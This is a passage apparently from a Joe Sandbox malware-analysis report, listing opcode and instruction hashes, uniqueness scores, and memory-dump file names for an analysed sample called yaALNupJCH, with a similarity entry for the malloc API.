                                                                                                • Opcode ID: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
                                                                                                • Instruction ID: a929929d55870eb2e3dfc3d9b08de53e37bb6c9da6c43a06ed963554b33c57a4
                                                                                                • Opcode Fuzzy Hash: 515cd9b0cc975ca03c008dfe43f6ff5eb83953987e78c9cd7cdb726aa12e4eb5
                                                                                                • Instruction Fuzzy Hash: A5F090B1554708CFDB006FA8E8C52153BA4F746219F5840BAE8150B201D735D5E1CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000003.00000002.910580394.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true
                                                                                                • Associated: 00000003.00000002.910576218.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910593168.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910615115.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910629670.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910635803.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910647357.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                • Associated: 00000003.00000002.910673455.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_3_2_61e00000_yaALNupJCH.jbxd
                                                                                                Similarity
                                                                                                • API ID: malloc
                                                                                                • String ID:
                                                                                                • API String ID: 2803490479-0
                                                                                                • Opcode ID: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
                                                                                                • Instruction ID: 08a60fc229ca929b4850671bf03eed3452f9cad2ea52f9bb94d0a5c68b8f0e05
                                                                                                • Opcode Fuzzy Hash: 1f2356de957b5852e51c4f16dd739168b253dd6d2aac726755fb4680bcc79cb1
                                                                                                • Instruction Fuzzy Hash: 68F039B0C4830A9FCB009FA5DAC5A0DBBE8EB84258F14C46DE8988F710D334E580CB51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%